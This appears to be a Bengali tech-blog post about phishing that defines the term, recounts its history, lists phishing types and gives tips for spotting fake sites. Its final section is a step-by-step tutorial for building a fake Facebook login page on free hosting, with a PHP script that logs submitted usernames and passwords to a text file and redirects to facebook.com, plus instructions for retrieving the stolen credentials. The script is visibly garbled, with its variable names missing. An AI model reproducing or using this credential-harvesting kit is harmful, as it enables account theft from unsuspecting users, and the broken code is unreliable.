আজকের টিউন এর আগে আমি সবাইকে অসংখ্য ধন্যবাদ দিয়ে শুরু করতে চাই আপনাদের সবার প্রচণ্ড সমর্থন আর উৎসাহের জন্য আমি জানি খুব ই কম । কিন্তু আপনাদের উৎসাহ আর সমর্থন ই আমাকে বার বার বাধ্য করে আমার স্বল্প জানা কে নিয়ে নতুন নতুন টিউন করার জন্য দোয়া করবেন যেন আমি সবসময়ই আপনাদের কে রুচিশীল এবং মার্জিত টিউন উপহার দিতে পারি

আজকের পর্বে আমরা আলোচনা করব ফিশিং নিয়ে । তো আসুন শুরু করা যাক

প্রথম প্রশ্ন ফিশিং কি ?

ফিশিং শব্দ শুনেন নি অথবা এ সম্পর্কে কিছুই জানেন না এমন মানুষের সংখ্যা বোধহয় টিউনার পেজ এ খুব বেশী একটা নেই ! তারপর ও আসুন দেখি আমি আপনাদের নতুন কি দিতে পারি আজকের টিউন এ ইংরেজি এর জাহাজ , ডুব জাহাজ রা হয়ত বলবেন ফিশিং মানে মাছ ধরা কিন্তু আসলেই কি তাই ? না ! দুটোর বানানেও বিস্তর ফারাক আর ব্যবহারে তো আকাশ আর পাতাল এর পার্থক্য মাছ ধরা ফিশিং এর বানান হচ্ছে  ”FISHING” আর আমাদের আলোচ্য ফিশিং এর বানান ” PHISHING” । পুঁথিগত বিদ্যা কি বলে আসুন দেখে নেই
উইকিপেডিয়া বলে ,

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

অর্থাৎ , একটা বিশ্বাসযোগ্য ইলেক্ট্রনিক যোগাযোগ মিডিয়া এর রূপ ব্যাবহার করে ইউজার নেম , পাসওয়ার্ড , ক্রেডিট কার্ড এর সব তথ্য ইত্যাদি বেআইনি ভাবে হাতিয়ে নেওয়া কে ফিশিং বলে ।
সহজ ভাষায় বলতে গেলে , ধরুন ফেসবুক এর যেকোনো ইউজার এর    ইউজার নেম , পাসওয়ার্ড  ইত্যাদি  হাতিয়ে নেওয়ার জন্য বেআইনি উপায়ে আমি যদি ফেসবুক এর মতই দেখতে একটা লগইন পেজ ব্যবহার করি তখন তাকে ফিশিং বলে ফিশিং সাধারণত একটা ইমেইল এর মাধ্যমে ছড়ানো হয়ে থাকে । যেখানে ওই নির্দিষ্ট ইমেইল এ ওই ইউজার কে বলা হয় সংশ্লিষ্ট সাইট এ কোন কারনে লগইন করতে এবং সেখানে লগইন লিঙ্ক ও দেওয়া থাকে । বলাই বাহুল্য এই লিঙ্ক আসল লিঙ্ক না ! এটা আসল টার মত দেখতে একই রকম একটা  লগইন পেজ যেটার সাহায্যে হ্যাকার তার ভিকটিম এর সব তথ্য চুরি করার নিয়তে তৈরি করেছে ।

 পরের প্রশ্ন , ফিশিং  এর  ইতিহাস কি ?

এত  আলোচিত একটা  বিষয় কিন্তু ১৯৯৫ সালের আগে এর কোন অস্তিত্ব ই ছিল না ! থাকলেও তা জনসমক্ষে আসে নাই । ১৯৯৫ সালে প্রথম ফিশিং এর অস্তিত্ব ধরা পড়লেও পরবর্তী এক দশক পর্যন্ত এ সম্পর্কে কোন জন সচতনেতা ও তৈরি হয় নি ! ইন্টারনেট এর রেকর্ড ঘাঁটলে জানা যায় , ১৯৯৬ সালের ২ জানুয়ারি প্রথম পৃথিবীর মানুষের সামনে ফিশিং এর মুখোশ উন্মচিত হয় । alt.online-service.america-online নামের একটা ইউজনেট নিউজগ্রুপ প্রথম এর অস্তিত্ব সম্পর্কে জানায় সবাইকে । তাদের তথ্য অনুযায়ী হ্যাকিং এর মত ফিশিং এর ও উৎপত্তি আমেরিকা তে । America Online বা  AOL service  এ প্রথম ফিশিং এর প্রয়োগ হয় ।
এবার আসি এর বিচিত্র বানানের কাছে ! তখনকার সময়ে হ্যাকার দের কে  ইন্টারনেট ও সংবাদমাধ্যম গুলো ফ্রিক (PHREAK) বলে সম্বোধিত করত ! Phreaking  শব্দের আভিধানিক  অর্থ হচ্ছে  টেলিকমিউনিকেশন এর বিভিন্ন দিক নিয়ে গবেষণা , আবিষ্কার  ও পড়াশোনা ! এটা মূলত একটা স্ল্যাং !  ওখান থেকেই হ্যাকার দের কে ফ্রিক নামাঙ্কিত করা হয় , কারন তারা  টেলিকমিউনিকেশন এর বিভিন্ন দিকে ছিলেন ঝানু ওস্তাদ কিন্তু সবাই ছিলেন আন্ডারগ্রাউন্ড। তারাই কেউ প্রথম ফিশিং চালু করেন ধারনা করা হয় । এবং যেহেতু ফিশিং পুরো প্রক্রিয়া টাই অনেক টা মাছ ধরার ফাঁদের মত টাই ফ্রিক দের “PH” এবং মাছ ধরার “ISHING”  টাকে একসাথে জোড়া দিয়ে ফিশিং(Phishing) শব্দটার উৎপত্তি হয়
ব্যবহার , সময় , কাল ইত্যাদি প্রেক্ষিতে হ্যাকিং এর বিভিন্ন টেকনিক ও ট্রিক কে  হোয়াইট , গ্রে বা ব্ল্যাক হ্যাকিং বলা হয়। কিন্তু শুরু থেকেই ফিশিং কে ব্ল্যাক হ্যাকিং গ্রুপ এ ফেলা হয়েছে ।

ফিশিং এর কি কোন ধরণ আছে ? থাকলে তা কি কি ?

জি, ফিশিং এর বিভিন্ন রূপের ধরণ আছে । আসুন দেখে নেই কি কি :

• Phishing :  সরাসরি ফিশিং করা কেই এই ক্যাটাগরি তে রাখা হয়েছে । এতে কোন নির্দিষ্ট টার্গেট / লক্ষ্য থাকে না । গণহারে ফিশিং করা এই  ক্যাটাগরি এর লক্ষ্য ।
• Spear Phishing :  একটি নির্দিষ্ট গ্রুপ বা মানুষকে টার্গেট করে ফিশিং করা কে Spear Phishing বলে ।
• Clone Phishing : এটা হছে , আগেই ইউজার কে ডেলিভারি দেওয়া একটা নির্দিষ্ট ইমেইল এর ক্লোন / দেখতে একই রকম একটা ইমেইল যেখানে সব এ আগের মত থাকে (বিষয়বস্তু , তথ্য ইত্যাদি ) শুধু  এটাচড  লিঙ্ক টা হ্যাকার এর তৈরি করা ফিশিং লিঙ্ক এর সাথে বদলে দেওয়া থাকে ।

• Whaling :  কোন একটা কম্পানি এর মাথা বা কর্তাব্যক্তি কে ইনফেকট করার জন্য পরিচালিত সব হ্যাকিং এই  ক্যাটাগরি এর অন্তর্ভুক্ত ।
• Link manipulation : যেকোনো অরিজিনাল লিঙ্ক এর মতই দেখতে কিন্তু সামান্য বানানের হেরফের করা লিঙ্ক গুলো ব্যবহার করে ফিশিং করলে তখন টাকে Link manipulation বলে । যেমন : ধরুন www.facebook.com এর Link manipulation হতে পারে www.faceb0Ok.com [ একটা "o"  এর স্থলে একটা "O" (zero) ব্যবহার করা হয়েছে ] !নিচের চিত্র টি দেখুন !

• Filter evasion :  ইমেইল সার্ভিস প্রোভাইডার রা সবসময় ফিশিং  ধরার জন্য সব ইমেইল কে ফিল্টার করে থাকে । এই ফিল্টার কে এড়ানোর জন্য টেক্সট কে এড়িয়ে ছবি ব্যাবহার করে যে ফিশিং করা হয় টাকে Filter evasion বলে ।
• Pop -up :  ধরুন আপনি একটা সাইট ভিজিট করছেন । এমন সময় হঠাৎ করে যদি একটা পপ আপ এসে আপনাকে বলে লগইন করতে অথবা কোন ধরনের তথ্য শেয়ার করতে তবে নিশ্চিত হয়ে যান এটা Pop-up phishing ।
• Tabnabbing : এই ধরনের ফিশিং এ যখন আপনি একাধিক ট্যাব ওপেন করবেন তখন নীরবে যেকোনো একটা ট্যাব কে পালটে ইনফেকটেড বা ফিশিং সাইট এ নিয়ে যায় !
• Evil twins :   এ যাবত কালের সব থেকে ভয়ঙ্কর ফিশিং এটা ! বিভিন্ন পাবলিক প্লেস এ যেখানে ওয়াইফাই থাকে , হ্যাকার রা নিজের একটা ওয়াইফাই জোন তৈরি করে । যখন ই কেউ ওই ওয়াইফাই জোন ব্যবহার করে এর সাথে সংযুক্ত হবে তখন থেকেই হ্যাকার সব ধরনের তথ্য চুরি করা শুরু করে ।
• Phone Phishing  :  এটাও  অনেক চমকপ্রদ একটা ফিশিং পন্থা । হ্যাকার  ইমেইল এর বদলে  একটা নির্দিষ্ট  কম্পানির কাস্টমার কেয়ার ম্যানেজার অথবা অপারেটর হিসেবে ভিকটিম কে কল করে এবং তার থেকে অত্যন্ত চাতুর্যের সাথে তার সব ব্যক্তিগত তথ্য হাতিয়ে নেয়  ।

পরবর্তী প্রশ্ন কিভাবে বুঝব যে আমি যেই সাইট টি ভিজিট করছি তা আসল নাকি একটা ফিশিং সাইট ?

খুব চমৎকার এবং সবথেকে গুরুত্বপূর্ণ প্রশ্ন  উত্তর হচ্ছে , ফিশিং এর জন্য যেসব সাইট কে টার্গেট করা হয় তার বেশিরভাগ সার্ভার আথেনটিকেশন বা পরিচিতি নিশ্চিতকরণ এর জন্য Transport Layer Security (TLS) , Secure Sockets Layer (SSL) এবং খুব ই শক্তিশালী ক্রিপটোগ্রাফী ব্যবহার করে থাকে । সবকিছুর প্রয়োগের উপর নির্ভর করে একটা সাইট কে সার্টিফিকেট দেওয়া হয় । আপডেট করা এবং সর্বাধুনিক সব ব্রাউজার এ যেকোনো ধরনের ফিশিং সাইট কে সনাক্ত করতে পারে এবং টা স্বয়ংক্রিয় ভাবে ব্লক ও করে দেয় । কিন্ত তারপর ও আপনি নিজেও কিছু সতর্কতা অবলম্বন করতে  পারেন । তার জন্য নিচের চিত্র দুটো লক্ষ্য করুন

উপরের ছবি দুটোতে দেখানো লক্ষণগুলি খেয়াল করুন আপনার ব্রাউজার এর অ্যাড্রেস বারে । এবং সবসময় এর জন্য লিঙ্ক টা খেয়াল করুন । লক্ষ্য করুন সবসময় এর মত লিঙ্ক টা কি আসল লিঙ্ক নাকি দেখতে একটু ভিন্ন কোন লিঙ্ক । ভিন্ন লিঙ্ক হলেই সাবধান এছাড়া আমি বলব ভালমানের আপডেটেড ইন্টারনেট সিক্যুরিটি ব্যবহার করতে ।

 মিলিয়ন ডলার প্রশ্ন কিভাবে বানাব একটা ফিশিং সাইট ?

আমি শুরুতেই বলে নেই এটা শুধুমাত্র শেখার জন্য বর্ণনা করা হছে । কেউ এটার কোনরূপ ধ্বংসাত্মক বা ক্ষতিসাধন উদ্দেশে ব্যবহার করলে তার জন্য টিউনার পেজ বা আমি কোনভাবেই দায়ী থাকব না ধন্যবাদ ।

এবার আমি ধাপে ধাপে বর্ণনা করব কিভাবে আপনি একটা ফিশিং সাইট বানাবেন । উদাহরণের জন্য আমরা ফেসবুক এর একটা ফিশিং সাইট বানাব
১ম ধাপ :  প্রথমেই আপনার দরকার একটা  হোস্টিং  ও একটা ডোমেইন । এর জন্য আমরা ফ্রি  হোস্টিং  এ রেজিস্ট্রেশান করব । আমি এ ক্ষেত্রে  000webhost  ব্যবহার করব ফ্রি    হোস্টিং  এর জন্য ।  000webhost  এ রেজিস্ট্রেশান করতে ক্লিক করুন  এই লিঙ্কে ।  নিচের চিত্রের মত রেজিস্ট্রেশান পেজ আসলে সব ডাটা দিয়ে রেজিস্ট্রেশান করুন । এবং ইমেইল ভেরিফিকেশন করুন ।


২য় ধাপ : এবার www.facebook.com এ যান এবং লগইন পেজ এ আসুন । এটা নিশ্চিত করুন যে আপনি লগ আউট করা এবং এটা ফেসবুক এর লগইন পেজ ।  এবার এই পেজ এর যেকোনো জায়গায় রাইট ক্লিক করে View page source  এ ক্লিক করুন ।
৩য় ধাপ :   View page source এ ক্লিক করলে নিচের চিত্রের মত একটা ট্যাব ওপেন হবে । এবার এই ট্যাব এর সব কিছু কে Ctrl + A চেপে সিলেক্ট করুন এবং একটা নোট প্যাড এ পেস্ট করুন । এবার এটাকে সেভ করুন Login.htm নামে ।

<?php
header ('Location: http://facebook.com ');
 = fopen("passwords.txt", "a");
foreach(Array as => ) {
fwrite(, );
fwrite(, "=");
fwrite(, );
fwrite(, "rn");
}
fwrite(, "rn");
fclose();
exit;
?> 

পরবর্তী  প্রশ্ন , ফিশিং সাইট তো তৈরি করলাম কিন্তু ইউজারনেম ও পাসওয়ার্ড পাব কিভাবে ?  

http://www.yoursitesadress.p4o.net/lol.html [ লক্ষ্য রাখুন এখানে অবশ্যই   yoursitesadress  এর জায়গা তে আপনার তৈরি ডোমেইন এর লিঙ্ক লিখুন ] এইলিঙ্ক এ যান এবং  লগইন করলেই দেখতে পারবেন নিচের চিত্রের মত দৃশ্য




আজকের মত এই ছিল ফিশিং বিষয়ে বিস্তারিত আলোচনা । ভালো খারাপ যাই লাগুক আপনার মতামত জানাবেন দয়াকরে । তাহলে নিজের ভুল গুলো সুধ্রাতে পারব.....................।।